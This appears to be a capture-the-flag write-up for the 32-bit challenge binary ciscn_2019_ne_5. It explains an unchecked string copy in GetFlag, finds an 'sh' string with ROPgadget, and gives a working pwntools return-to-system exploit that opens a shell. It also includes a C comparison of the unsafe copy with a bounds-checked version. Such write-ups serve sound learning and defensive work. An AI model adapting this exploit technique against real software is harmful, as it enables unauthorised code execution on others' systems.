ciscn_2019_ne_5

- 32-bit ROP
- hijacking program logic
- `sh` as a substitute for `/bin/sh`
- stack overwrite
- finding the string with ROPgadget
- the GetFlag function
1. In the GetFlag function, the src variable that was filled in earlier by AddLog is copied into dest; this copy is where the overflow is.
2. The Print function calls system, so system can be reached through its PLT entry (plt_system).
3. Use ROPgadget to locate an `sh` string, build the payload, and get a shell.
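To make the root cause concrete from the defender's side, here is an added C illustration (not code from the original writeup or from the challenge binary) of the AddLog/GetFlag copy pattern next to a bounds-checked version. The buffer size `LOG_MAX`, the `struct log_entry` type and the function names are constructed assumptions; the real binary's layout is only known from the 0x4C bytes of padding the exploit uses.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed buffer size; the real binary's frame layout is not given on the
   page beyond the 0x4C bytes of padding the exploit needs. */
#define LOG_MAX 64

struct log_entry {
    char dest[LOG_MAX];
};

/* Vulnerable pattern (constructed stand-in for GetFlag): the user-controlled
   src is copied into a fixed-size stack buffer with no length check, so a log
   longer than LOG_MAX-1 bytes runs past dest into the saved frame pointer and
   the return address. Kept only for comparison; never call it on untrusted
   input. */
static void get_flag_unsafe(struct log_entry *e, const char *src)
{
    strcpy(e->dest, src);
}

/* Hardened form: measure src against the destination capacity first, refuse
   anything that does not fit together with its terminator, and never leave
   dest unterminated. Returns 0 on success, -1 when the input was rejected. */
int get_flag_safe(struct log_entry *e, const char *src)
{
    size_t n = 0;
    while (n < LOG_MAX && src[n] != '\0')
        n++;
    if (n >= LOG_MAX) {          /* no room left for the NUL terminator */
        e->dest[0] = '\0';
        return -1;
    }
    memcpy(e->dest, src, n + 1); /* copies the terminator as well */
    return 0;
}

int main(void)
{
    struct log_entry e;
    char oversized[LOG_MAX + 16];                /* constructed: longer than dest */
    memset(oversized, 'A', sizeof oversized - 1);
    oversized[sizeof oversized - 1] = '\0';

    printf("short log accepted: %d\n", get_flag_safe(&e, "log entry"));   /* 0 */
    printf("oversized log rejected: %d\n", get_flag_safe(&e, oversized)); /* -1 */
    (void)get_flag_unsafe; /* referenced only so the comparison version compiles unused */
    return 0;
}
```

The check in `get_flag_safe` is what the binary lacks: the caller-supplied length is compared against the destination capacity before any byte is written, and an oversized log is dropped with a clean error instead of spilling over the saved return address.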
```
bamuwe@qianenzhao:~/done/ciscn_2019_ne_5$ ROPgadget --binary ciscn_2019_ne_5 --string 'sh'
Strings information
============================================================
0x080482ea : sh
```
| Step | Content | Value | Note |
|---|---|---|---|
| password | administrator | | |
| menu choice | 1 | | AddLog |
| payload1 | padding | 0x4C bytes | fills dest plus the saved ebp (padding + leave) |
| | system@plt | | overwrites the return address, lands in system |
| | 0xdeadbeef | | fake return address for system |
| | sh | 0x080482ea | argument to system |
```python
from pwn import *
context.log_level = 'debug'
elf = ELF('./ciscn_2019_ne_5')
io = process('./ciscn_2019_ne_5')
#io = gdb.debug('./ciscn_2019_ne_5','break *080486C7')
io.sendlineafter(b'Please input admin password:',b'administrator')
io.sendlineafter(b':\n',b'1')
payload1 = b'A'*0x4C+p32(elf.sym['system'])+p32(0xdeadbeef)+p32(0x080482ea) # p32(0) cannot replace p32(0xdeadbeef): a NUL byte would cut the string copy short
io.sendlineafter(b'Please input new log info:',payload1)
io.sendlineafter(b':\n',b'4')
io.interactive()
```
Tags: ciscn, system, ne, sh, 2019, io
From: https://www.cnblogs.com/bamuwe/p/17937077